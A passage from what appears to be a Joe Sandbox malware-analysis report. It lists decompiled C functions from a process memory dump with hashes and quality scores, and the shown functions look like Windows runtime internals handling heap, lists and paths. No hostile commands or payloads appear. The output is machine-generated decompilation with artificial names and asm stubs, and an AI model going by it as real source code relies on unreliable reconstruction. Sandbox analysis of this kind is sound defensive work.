                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1bee7c5d26fe4c7e363040ef47c4c02082679335156cb869c15166b80694cc5c
                    • Instruction ID: 923053249c646e3ed88b6e70aa83acba2c0e354ca9827a11e33aa13c40b516a0
                    • Opcode Fuzzy Hash: 1bee7c5d26fe4c7e363040ef47c4c02082679335156cb869c15166b80694cc5c
                    • Instruction Fuzzy Hash: B64199B1D01209AFDB20CFAAC840BEEBBF9EF58314F14862EE915A7240DB709905CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E01665210(intOrPtr _a4, void* _a8) {
                    				void* __ecx;
                    				intOrPtr _t31;
                    				signed int _t32;
                    				signed int _t33;
                    				intOrPtr _t35;
                    				signed int _t52;
                    				void* _t54;
                    				void* _t56;
                    				unsigned int _t59;
                    				signed int _t60;
                    				void* _t61;
                    
                    				_t61 = E016652A5(1);
                    				if(_t61 == 0) {
                    					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                    					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                    					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                    				} else {
                    					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                    					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                    				}
                    				_t60 = _t59 >> 1;
                    				_t32 = 0x3a;
                    				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                    					_t52 = _t60 + _t60;
                    					if(_a4 > _t52) {
                    						goto L5;
                    					}
                    					if(_t61 != 0) {
                    						asm("lock xadd [esi], eax");
                    						if((_t32 | 0xffffffff) == 0) {
                    							_push( *((intOrPtr*)(_t61 + 4)));
                    							E016A95D0();
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                    						}
                    					} else {
                    						E0167EB70(_t54, 0x17579a0);
                    					}
                    					_t26 = _t52 + 2; // 0xddeeddf0
                    					return _t26;
                    				} else {
                    					_t52 = _t60 + _t60;
                    					if(_a4 < _t52) {
                    						if(_t61 != 0) {
                    							asm("lock xadd [esi], eax");
                    							if((_t32 | 0xffffffff) == 0) {
                    								_push( *((intOrPtr*)(_t61 + 4)));
                    								E016A95D0();
                    								L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                    							}
                    						} else {
                    							E0167EB70(_t54, 0x17579a0);
                    						}
                    						return _t52;
                    					}
                    					L5:
                    					_t33 = E016AF3E0(_a8, _t54, _t52);
                    					if(_t61 == 0) {
                    						E0167EB70(_t54, 0x17579a0);
                    					} else {
                    						asm("lock xadd [esi], eax");
                    						if((_t33 | 0xffffffff) == 0) {
                    							_push( *((intOrPtr*)(_t61 + 4)));
                    							E016A95D0();
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                    						}
                    					}
                    					_t35 = _a8;
                    					if(_t60 <= 1) {
                    						L9:
                    						_t60 = _t60 - 1;
                    						 *((short*)(_t52 + _t35 - 2)) = 0;
                    						goto L10;
                    					} else {
                    						_t56 = 0x3a;
                    						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                    							 *((short*)(_t52 + _t35)) = 0;
                    							L10:
                    							return _t60 + _t60;
                    						}
                    						goto L9;
                    					}
                    				}
                    			}















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ad7b0770e39003e863eea9efab33c79925a6080cc9b1623cb9c9751802305b5e
                    • Instruction ID: 6cca2d75f0f0ac6e754e3ddba6dd199ff91210c67531e1a15e0c06b0f3ae4745
                    • Opcode Fuzzy Hash: ad7b0770e39003e863eea9efab33c79925a6080cc9b1623cb9c9751802305b5e
                    • Instruction Fuzzy Hash: F731E836251601EBC726AB18CD92B7A7BAAFF10B60F11861EF9564B690DB70FC01C694
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E016A3D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                    				intOrPtr _v8;
                    				char _v12;
                    				signed short** _t33;
                    				short* _t38;
                    				intOrPtr* _t39;
                    				intOrPtr* _t41;
                    				signed short _t43;
                    				intOrPtr* _t47;
                    				intOrPtr* _t53;
                    				signed short _t57;
                    				intOrPtr _t58;
                    				signed short _t60;
                    				signed short* _t61;
                    
                    				_t47 = __ecx;
                    				_t61 = __edx;
                    				_t60 = ( *__ecx & 0x0000ffff) + 2;
                    				if(_t60 > 0xfffe) {
                    					L22:
                    					return 0xc0000106;
                    				}
                    				if(__edx != 0) {
                    					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                    						L5:
                    						E01677B60(0, _t61, 0x16411c4);
                    						_v12 =  *_t47;
                    						_v12 = _v12 + 0xfff8;
                    						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                    						E01677B60(0xfff8, _t61,  &_v12);
                    						_t33 = _a8;
                    						if(_t33 != 0) {
                    							 *_t33 = _t61;
                    						}
                    						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                    						_t53 = _a12;
                    						if(_t53 != 0) {
                    							_t57 = _t61[2];
                    							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                    							while(_t38 >= _t57) {
                    								if( *_t38 == 0x5c) {
                    									_t41 = _t38 + 2;
                    									if(_t41 == 0) {
                    										break;
                    									}
                    									_t58 = 0;
                    									if( *_t41 == 0) {
                    										L19:
                    										 *_t53 = _t58;
                    										goto L7;
                    									}
                    									 *_t53 = _t41;
                    									goto L7;
                    								}
                    								_t38 = _t38 - 2;
                    							}
                    							_t58 = 0;
                    							goto L19;
                    						} else {
                    							L7:
                    							_t39 = _a16;
                    							if(_t39 != 0) {
                    								 *_t39 = 0;
                    								 *((intOrPtr*)(_t39 + 4)) = 0;
                    								 *((intOrPtr*)(_t39 + 8)) = 0;
                    								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                    							}
                    							return 0;
                    						}
                    					}
                    					_t61 = _a4;
                    					if(_t61 != 0) {
                    						L3:
                    						_t43 = L01684620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                    						_t61[2] = _t43;
                    						if(_t43 == 0) {
                    							return 0xc0000017;
                    						}
                    						_t61[1] = _t60;
                    						 *_t61 = 0;
                    						goto L5;
                    					}
                    					goto L22;
                    				}
                    				_t61 = _a4;
                    				if(_t61 == 0) {
                    					return 0xc000000d;
                    				}
                    				goto L3;
                    			}

















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 17cda32bc45fd6a7bff92c62dd61a46f5f06c69448419b45a840dcbded90c502
                    • Instruction ID: bd32183af8b963549c22eacb4f48635067333d53fa1290e1ffe024ff5274e3be
                    • Opcode Fuzzy Hash: 17cda32bc45fd6a7bff92c62dd61a46f5f06c69448419b45a840dcbded90c502
                    • Instruction Fuzzy Hash: 6331BC32A01615DBD7259F2DDC41A7ABBE5FF55700B46806EE949CB360EB30DC41CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 78%
                    			E0169A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                    				intOrPtr _t35;
                    				intOrPtr _t39;
                    				intOrPtr _t45;
                    				intOrPtr* _t51;
                    				intOrPtr* _t52;
                    				intOrPtr* _t55;
                    				signed int _t57;
                    				intOrPtr* _t59;
                    				intOrPtr _t68;
                    				intOrPtr* _t77;
                    				void* _t79;
                    				signed int _t80;
                    				intOrPtr _t81;
                    				char* _t82;
                    				void* _t83;
                    
                    				_push(0x24);
                    				_push(0x1740220);
                    				E016BD08C(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                    				_t79 = __ecx;
                    				_t35 =  *0x1757b9c; // 0x0
                    				_t55 = L01684620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                    				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                    				if(_t55 == 0) {
                    					_t39 = 0xc0000017;
                    					L11:
                    					return E016BD0D1(_t39);
                    				}
                    				_t68 = 0;
                    				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                    				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                    				_t7 = _t55 + 8; // 0x8
                    				_t57 = 6;
                    				memcpy(_t7, _t79, _t57 << 2);
                    				_t80 = 0xfffffffe;
                    				 *(_t83 - 4) = _t80;
                    				if(0 < 0) {
                    					L14:
                    					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                    					L20:
                    					L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                    					_t39 = _t81;
                    					goto L11;
                    				}
                    				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                    					_t81 = 0xc000007b;
                    					goto L20;
                    				}
                    				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                    					_t59 =  *((intOrPtr*)(_t83 + 8));
                    					_t45 =  *_t59;
                    					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                    					 *_t59 = _t45 + 1;
                    					L6:
                    					 *(_t83 - 4) = 1;
                    					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                    					 *(_t83 - 4) = _t80;
                    					if(_t68 < 0) {
                    						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                    						if(_t82 == 0) {
                    							goto L14;
                    						}
                    						asm("btr eax, ecx");
                    						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                    						if( *_t82 != 0) {
                    							 *0x1757b10 =  *0x1757b10 - 8;
                    						}
                    						goto L20;
                    					}
                    					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                    					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                    					_t51 =  *0x175536c; // 0x77575368
                    					if( *_t51 != 0x1755368) {
                    						_push(3);
                    						asm("int 0x29");
                    						goto L14;
                    					}
                    					 *_t55 = 0x1755368;
                    					 *((intOrPtr*)(_t55 + 4)) = _t51;
                    					 *_t51 = _t55;
                    					 *0x175536c = _t55;
                    					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                    					if(_t52 != 0) {
                    						 *_t52 = _t55;
                    					}
                    					_t39 = 0;
                    					goto L11;
                    				}
                    				_t77 =  *((intOrPtr*)(_t83 + 8));
                    				_t68 = E0169A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                    				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                    				if(_t68 < 0) {
                    					goto L14;
                    				}
                    				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                    				goto L6;
                    			}



















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c79b16a3bda12da1d86cdfc9fe59ecce92ccaf7cbd729908bcba1c14c371e67
                    • Instruction ID: 3e5f5bf544087fdc05460dbb5473df0c8ab162ebb7954dec0bcb76956187a6ab
                    • Opcode Fuzzy Hash: 4c79b16a3bda12da1d86cdfc9fe59ecce92ccaf7cbd729908bcba1c14c371e67
                    • Instruction Fuzzy Hash: 0F4179B5A00215DFCF14CF98C890BA9BBF6BB89318F1581ADE905AF344C775A941CB94
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E0168C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                    				signed int* _v8;
                    				char _v16;
                    				void* __ebx;
                    				void* __edi;
                    				signed char _t33;
                    				signed char _t43;
                    				signed char _t48;
                    				signed char _t62;
                    				void* _t63;
                    				intOrPtr _t69;
                    				intOrPtr _t71;
                    				unsigned int* _t82;
                    				void* _t83;
                    
                    				_t80 = __ecx;
                    				_t82 = __edx;
                    				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                    				_t62 = _t33 >> 0x00000001 & 0x00000001;
                    				if((_t33 & 0x00000001) != 0) {
                    					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                    					if(E01687D50() != 0) {
                    						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                    					} else {
                    						_t43 = 0x7ffe0386;
                    					}
                    					if( *_t43 != 0) {
                    						_t43 = E01738D34(_v8, _t80);
                    					}
                    					E01682280(_t43, _t82);
                    					if( *((char*)(_t80 + 0xdc)) == 0) {
                    						E0167FFB0(_t62, _t80, _t82);
                    						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                    						_t30 = _t80 + 0xd0; // 0xd0
                    						_t83 = _t30;
                    						E01738833(_t83,  &_v16);
                    						_t81 = _t80 + 0x90;
                    						E0167FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                    						_t63 = 0;
                    						_push(0);
                    						_push(_t83);
                    						_t48 = E016AB180();
                    						if(_a4 != 0) {
                    							E01682280(_t48, _t81);
                    						}
                    					} else {
                    						_t69 = _v8;
                    						_t12 = _t80 + 0x98; // 0x98
                    						_t13 = _t69 + 0xc; // 0x575651ff
                    						E0168BB2D(_t13, _t12);
                    						_t71 = _v8;
                    						_t15 = _t80 + 0xb0; // 0xb0
                    						_t16 = _t71 + 8; // 0x8b000cc2
                    						E0168BB2D(_t16, _t15);
                    						E0168B944(_v8, _t62);
                    						 *((char*)(_t80 + 0xdc)) = 0;
                    						E0167FFB0(0, _t80, _t82);
                    						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                    						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                    						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                    						 *(_t80 + 0xde) = 0;
                    						if(_a4 == 0) {
                    							_t25 = _t80 + 0x90; // 0x90
                    							E0167FFB0(0, _t80, _t25);
                    						}
                    						_t63 = 1;
                    					}
                    					return _t63;
                    				}
                    				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                    				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                    				if(_a4 == 0) {
                    					_t24 = _t80 + 0x90; // 0x90
                    					E0167FFB0(0, __ecx, _t24);
                    				}
                    				return 0;
                    			}

















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                    • Instruction ID: 8210faa8e7d1f702d3bcd9ed8bd023c14f7a7459e6bc2bf1392c90839c86f388
                    • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                    • Instruction Fuzzy Hash: 90311472A01587AED705FBB8CC90BE9FB55BF56200F04825ED42C47341DB386A46CBE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 76%
                    			E016E7016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                    				signed int _v8;
                    				char _v588;
                    				intOrPtr _v592;
                    				intOrPtr _v596;
                    				signed short* _v600;
                    				char _v604;
                    				short _v606;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed short* _t55;
                    				void* _t56;
                    				signed short* _t58;
                    				signed char* _t61;
                    				char* _t68;
                    				void* _t69;
                    				void* _t71;
                    				void* _t72;
                    				signed int _t75;
                    
                    				_t64 = __edx;
                    				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                    				_v8 =  *0x175d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                    				_t55 = _a16;
                    				_v606 = __ecx;
                    				_t71 = 0;
                    				_t58 = _a12;
                    				_v596 = __edx;
                    				_v600 = _t58;
                    				_t68 =  &_v588;
                    				if(_t58 != 0) {
                    					_t71 = ( *_t58 & 0x0000ffff) + 2;
                    					if(_t55 != 0) {
                    						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                    					}
                    				}
                    				_t8 = _t71 + 0x2a; // 0x28
                    				_t33 = _t8;
                    				_v592 = _t8;
                    				if(_t71 <= 0x214) {
                    					L6:
                    					 *((short*)(_t68 + 6)) = _v606;
                    					if(_t64 != 0xffffffff) {
                    						asm("cdq");
                    						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                    						 *((char*)(_t68 + 0x28)) = _a4;
                    						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                    						 *((char*)(_t68 + 0x29)) = _a8;
                    						if(_t71 != 0) {
                    							_t22 = _t68 + 0x2a; // 0x2a
                    							_t64 = _t22;
                    							E016E6B4C(_t58, _t22, _t71,  &_v604);
                    							if(_t55 != 0) {
                    								_t25 = _v604 + 0x2a; // 0x2a
                    								_t64 = _t25 + _t68;
                    								E016E6B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                    							}
                    							if(E01687D50() == 0) {
                    								_t61 = 0x7ffe0384;
                    							} else {
                    								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    							}
                    							_push(_t68);
                    							_push(_v592 + 0xffffffe0);
                    							_push(0x402);
                    							_push( *_t61 & 0x000000ff);
                    							E016A9AE0();
                    						}
                    					}
                    					_t35 =  &_v588;
                    					if( &_v588 != _t68) {
                    						_t35 = L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                    					}
                    					L16:
                    					_pop(_t69);
                    					_pop(_t72);
                    					_pop(_t56);
                    					return E016AB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                    				}
                    				_t68 = L01684620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                    				if(_t68 == 0) {
                    					goto L16;
                    				} else {
                    					_t58 = _v600;
                    					_t64 = _v596;
                    					goto L6;
                    				}
                    			}























                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1a7e25dee34e01a058393e1581c8809b25a7950b6128534c758c20352ce73d30
                    • Instruction ID: 5edafcd4f7358e09b4d2cd9ecf0548ed471c1e401b778a578760809207243b8d
                    • Opcode Fuzzy Hash: 1a7e25dee34e01a058393e1581c8809b25a7950b6128534c758c20352ce73d30
                    • Instruction Fuzzy Hash: 4A31A2726057519BC320DF68CD44AAAB7E6BF98600F044B2DF99587790E730E914CBE5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 70%
                    			E01713D40(intOrPtr __ecx, char* __edx) {
                    				signed int _v8;
                    				char* _v12;
                    				intOrPtr _v16;
                    				intOrPtr _v20;
                    				signed char _v24;
                    				char _v28;
                    				char _v29;
                    				intOrPtr* _v32;
                    				char _v36;
                    				char _v37;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed char _t34;
                    				intOrPtr* _t37;
                    				intOrPtr* _t42;
                    				intOrPtr* _t47;
                    				intOrPtr* _t48;
                    				intOrPtr* _t49;
                    				char _t51;
                    				void* _t52;
                    				intOrPtr* _t53;
                    				char* _t55;
                    				char _t59;
                    				char* _t61;
                    				intOrPtr* _t64;
                    				void* _t65;
                    				char* _t67;
                    				void* _t68;
                    				signed int _t70;
                    
                    				_t62 = __edx;
                    				_t72 = (_t70 & 0xfffffff8) - 0x1c;
                    				_v8 =  *0x175d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
                    				_t34 =  &_v28;
                    				_v20 = __ecx;
                    				_t67 = __edx;
                    				_v24 = _t34;
                    				_t51 = 0;
                    				_v12 = __edx;
                    				_v29 = 0;
                    				_v28 = _t34;
                    				E01682280(_t34, 0x1758a6c);
                    				_t64 =  *0x1755768; // 0x77575768
                    				if(_t64 != 0x1755768) {
                    					while(1) {
                    						_t8 = _t64 + 8; // 0x77575770
                    						_t42 = _t8;
                    						_t53 = _t64;
                    						 *_t42 =  *_t42 + 1;
                    						_v16 = _t42;
                    						E0167FFB0(_t53, _t64, 0x1758a6c);
                    						 *0x175b1e0(_v24, _t67);
                    						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
                    							_v37 = 1;
                    						}
                    						E01682280(_t45, 0x1758a6c);
                    						_t47 = _v28;
                    						_t64 =  *_t64;
                    						 *_t47 =  *_t47 - 1;
                    						if( *_t47 != 0) {
                    							goto L8;
                    						}
                    						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
                    							L10:
                    							_push(3);
                    							asm("int 0x29");
                    						} else {
                    							_t48 =  *((intOrPtr*)(_t53 + 4));
                    							if( *_t48 != _t53) {
                    								goto L10;
                    							} else {
                    								 *_t48 = _t64;
                    								_t61 =  &_v36;
                    								 *((intOrPtr*)(_t64 + 4)) = _t48;
                    								_t49 = _v32;
                    								if( *_t49 != _t61) {
                    									goto L10;
                    								} else {
                    									 *_t53 = _t61;
                    									 *((intOrPtr*)(_t53 + 4)) = _t49;
                    									 *_t49 = _t53;
                    									_v32 = _t53;
                    									goto L8;
                    								}
                    							}
                    						}
                    						L11:
                    						_t51 = _v29;
                    						goto L12;
                    						L8:
                    						if(_t64 != 0x1755768) {
                    							_t67 = _v20;
                    							continue;
                    						}
                    						goto L11;
                    					}
                    				}
                    				L12:
                    				E0167FFB0(_t51, _t64, 0x1758a6c);
                    				while(1) {
                    					_t37 = _v28;
                    					_t55 =  &_v28;
                    					if(_t37 == _t55) {
                    						break;
                    					}
                    					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
                    						goto L10;
                    					} else {
                    						_t59 =  *_t37;
                    						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
                    							goto L10;
                    						} else {
                    							_t62 =  &_v28;
                    							_v28 = _t59;
                    							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
                    							continue;
                    						}
                    					}
                    					L18:
                    				}
                    				_pop(_t65);
                    				_pop(_t68);
                    				_pop(_t52);
                    				return E016AB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
                    				goto L18;
                    			}


































                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: fcb9d3497acdb60e1b42610bbcb3fd1224d5a3741be8596a1fe06884545e579f
                    • Instruction ID: 1942f8f64206ed202e2e3d36eecf36a9a2d2487457c87054ca1f6dbfc314ed61
                    • Opcode Fuzzy Hash: fcb9d3497acdb60e1b42610bbcb3fd1224d5a3741be8596a1fe06884545e579f
                    • Instruction Fuzzy Hash: 8C317C71609342CFCB10DF29C99081AFBE1FF89720F4489AEE8989B245D770D908CB96
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0169A70E(intOrPtr* __ecx, char* __edx) {
                    				unsigned int _v8;
                    				intOrPtr* _v12;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t16;
                    				intOrPtr _t17;
                    				intOrPtr _t28;
                    				char* _t33;
                    				intOrPtr _t37;
                    				intOrPtr _t38;
                    				void* _t50;
                    				intOrPtr _t52;
                    
                    				_push(__ecx);
                    				_push(__ecx);
                    				_t52 =  *0x1757b10; // 0x0
                    				_t33 = __edx;
                    				_t48 = __ecx;
                    				_v12 = __ecx;
                    				if(_t52 == 0) {
                    					 *0x1757b10 = 8;
                    					 *0x1757b14 = 0x1757b0c;
                    					 *0x1757b18 = 1;
                    					L6:
                    					_t2 = _t52 + 1; // 0x1
                    					E0169A990(0x1757b10, _t2, 7);
                    					asm("bts ecx, eax");
                    					 *_t48 = _t52;
                    					 *_t33 = 1;
                    					L3:
                    					_t16 = 0;
                    					L4:
                    					return _t16;
                    				}
                    				_t17 = L0169A840(__edx, __ecx, __ecx, _t52, 0x1757b10, 1, 0);
                    				if(_t17 == 0xffffffff) {
                    					_t37 =  *0x1757b10; // 0x0
                    					_t3 = _t37 + 0x27; // 0x27
                    					__eflags = _t3 >> 5 -  *0x1757b18; // 0x0
                    					if(__eflags > 0) {
                    						_t38 =  *0x1757b9c; // 0x0
                    						_t4 = _t52 + 0x27; // 0x27
                    						_v8 = _t4 >> 5;
                    						_t50 = L01684620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                    						__eflags = _t50;
                    						if(_t50 == 0) {
                    							_t16 = 0xc0000017;
                    							goto L4;
                    						}
                    						 *0x1757b18 = _v8;
                    						_t8 = _t52 + 7; // 0x7
                    						E016AF3E0(_t50,  *0x1757b14, _t8 >> 3);
                    						_t28 =  *0x1757b14; // 0x0
                    						__eflags = _t28 - 0x1757b0c;
                    						if(_t28 != 0x1757b0c) {
                    							L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                    						}
                    						_t9 = _t52 + 8; // 0x8
                    						 *0x1757b14 = _t50;
                    						_t48 = _v12;
                    						 *0x1757b10 = _t9;
                    						goto L6;
                    					}
                    					 *0x1757b10 = _t37 + 8;
                    					goto L6;
                    				}
                    				 *__ecx = _t17;
                    				 *_t33 = 0;
                    				goto L3;
                    			}

















                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf73342d3cbb188f0c8b937e421a2652fd77d2082f68169379f4756b55471cf9
                    • Instruction ID: 9461027bc4679d4a37351c45ccba8f57b6d1dda7c163bb1f31be04d205e1aaf1
                    • Opcode Fuzzy Hash: cf73342d3cbb188f0c8b937e421a2652fd77d2082f68169379f4756b55471cf9
                    • Instruction Fuzzy Hash: D731B0B56003019FDB29CF58DC81F29BBFAFB84720F95895AE6158B344D7B19901CBD2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 97%
                    			E016961A0(signed int* __ecx) {
                    				intOrPtr _v8;
                    				char _v12;
                    				intOrPtr* _v16;
                    				intOrPtr _v20;
                    				intOrPtr _t30;
                    				intOrPtr _t31;
                    				void* _t32;
                    				intOrPtr _t33;
                    				intOrPtr _t37;
                    				intOrPtr _t49;
                    				signed int _t51;
                    				intOrPtr _t52;
                    				signed int _t54;
                    				void* _t59;
                    				signed int* _t61;
                    				intOrPtr* _t64;
                    
                    				_t61 = __ecx;
                    				_v12 = 0;
                    				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                    				_v16 = __ecx;
                    				_v8 = 0;
                    				if(_t30 == 0) {
                    					L6:
                    					_t31 = 0;
                    					L7:
                    					return _t31;
                    				}
                    				_t32 = _t30 + 0x5d8;
                    				if(_t32 == 0) {
                    					goto L6;
                    				}
                    				_t59 = _t32 + 0x30;
                    				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                    					goto L6;
                    				}
                    				if(__ecx != 0) {
                    					 *((intOrPtr*)(__ecx)) = 0;
                    					 *((intOrPtr*)(__ecx + 4)) = 0;
                    				}
                    				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                    					_t51 =  *(_t32 + 0x10);
                    					_t33 = _t32 + 0x10;
                    					_v20 = _t33;
                    					_t54 =  *(_t33 + 4);
                    					if((_t51 | _t54) == 0) {
                    						_t37 = E01695E50(0x16467cc, 0, 0,  &_v12);
                    						if(_t37 != 0) {
                    							goto L6;
                    						}
                    						_t52 = _v8;
                    						asm("lock cmpxchg8b [esi]");
                    						_t64 = _v16;
                    						_t49 = _t37;
                    						_v20 = 0;
                    						if(_t37 == 0) {
                    							if(_t64 != 0) {
                    								 *_t64 = _v12;
                    								 *((intOrPtr*)(_t64 + 4)) = _t52;
                    							}
                    							E01739D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                    							_t31 = 1;
                    							goto L7;
